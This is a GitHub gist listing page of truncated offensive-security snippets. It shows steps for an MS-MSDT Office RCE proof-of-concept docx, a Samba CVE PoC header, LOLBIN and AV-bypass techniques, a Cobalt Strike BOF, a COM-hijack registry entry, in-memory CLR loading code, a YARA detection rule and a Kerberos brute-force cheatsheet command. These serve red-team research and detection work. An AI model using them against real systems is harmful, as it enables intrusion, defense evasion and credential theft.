Skip to content

Instantly share code, notes, and snippets.

@tothi
tothi / ms-msdt.MD
Last active April 18, 2024 02:22
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
@0xsha
0xsha / CVE-2021-44142.py
Last active October 3, 2023 13:34
CVE-2021-44142 PoC Samba 4.15.0 OOB Read/Write
# CVE-2021-44142 PoC Samba 4.15.0 OOB Read/Write
# (C) 2022 - 0xSha.io - @0xSha
# This PoC is un-weaponized and for educational purposes only .
# To learn how to use the PoC please read the writeup :
# https://0xsha.io/blog/a-samba-horror-story-cve-2021-44142
# requires samba4-python
# Refrences :
# https://www.thezdi.com/blog/2022/2/1/cve-2021-44142-details-on-a-samba-code-execution-bug-demonstrated-at-pwn2own-austin
# Patch : https://attachments.samba.org/attachment.cgi?id=17092
@bohops
bohops / AccCheckConsole.txt
Last active February 28, 2024 19:15
AccChecker LOLBIN [AccCheckConsole.exe]
*Purpose
- UI Accessibility Checker
- Verifies UI accessibility requirements
*LOLBIN Functionality/Steps
1) Go to "Custom Verification Routines" link in reference section and copy the sample verification C# code into Visual Studio.
2) Add proper assembly references (e.g. AccCheck.dll)
3) Insert your C# code under a target method such as Execute()
4) Compile to a .NET managed library (DLL)
5) Invoke the code
@theevilbit
theevilbit / divide_and_conquer.c
Created January 17, 2021 15:11
Divide and Conquer NextGen AV bypass
/*
This is a POC for a generic technique I called internally on our red team assessment "Divide and Conquer", which can be used to bypass behavioral based NextGen AV detection. It works by splitting malicious actions and API calls into distinct processes.
*/
#include <stdio.h>
#include <tchar.h>
#include <windows.h>
#include "Commctrl.h"
#include <string>
@G0ldenGunSec
G0ldenGunSec / EnumCLR.c
Last active February 23, 2024 10:37
Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.
#include <string.h>
#include <stdio.h>
#include <windows.h>
#include <psapi.h>
#include "beacon.h"
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcesses(DWORD *, DWORD, LPDWORD);
DECLSPEC_IMPORT WINBASEAPI HANDLE WINAPI KERNEL32$OpenProcess(DWORD, BOOL, DWORD);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcessModulesEx(HANDLE, HMODULE*, DWORD, LPDWORD, DWORD);
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Classes\Scripting.FileSystemObject]
@=""
[HKEY_CURRENT_USER\Software\Classes\Scripting.FileSystemObject\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
@mattifestation
mattifestation / rundll_exports.csv
Created October 18, 2019 13:48
All System32 DLL export functions that contain "RunDLL", an indicator that it's designed to run with rundll32.exe
Module Function
C:\Windows\System32\advpack.dll DelNodeRunDLL32W
C:\Windows\System32\advpack.dll DelNodeRunDLL32A
C:\Windows\System32\advpack.dll DelNodeRunDLL32
C:\Windows\System32\ConnectedAccountState.dll ActionCenterRunDllW
C:\Windows\System32\cryptcatsvc.dll CatDbOfflineRebuildDatabasesRundll32W
C:\Windows\System32\cscui.dll CSCOptions_RunDLLW
C:\Windows\System32\cscui.dll CSCOptions_RunDLLA
C:\Windows\System32\cscui.dll CSCOptions_RunDLL
C:\Windows\System32\devmgr.dll DeviceProblenWizard_RunDLLW
@itsreallynick
itsreallynick / gen_URLpersistence.yar
Last active March 10, 2020 12:47
Yara rules for .url tricks that didn't fit in a tweet
rule Methodology_Suspicious_Shortcut_Local_URL
{
meta:
author = "@itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)"
description = "Detects local script usage for .URL persistence"
reference = "https://twitter.com/cglyer/status/1176184798248919044"
strings:
$file = "URL=file:///" nocase
$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
$url_explicit = "[InternetShortcut]" nocase
@Arno0x
Arno0x / TestAssembly.cs
Last active May 19, 2024 11:37
This code shows how to load a CLR in an unmanaged process, then load an assembly from memory (not from a file) and execute a method
/*
================================ Compile as a .Net DLL ==============================
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs
*/
using System.Windows.Forms;
namespace TestNamespace
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module: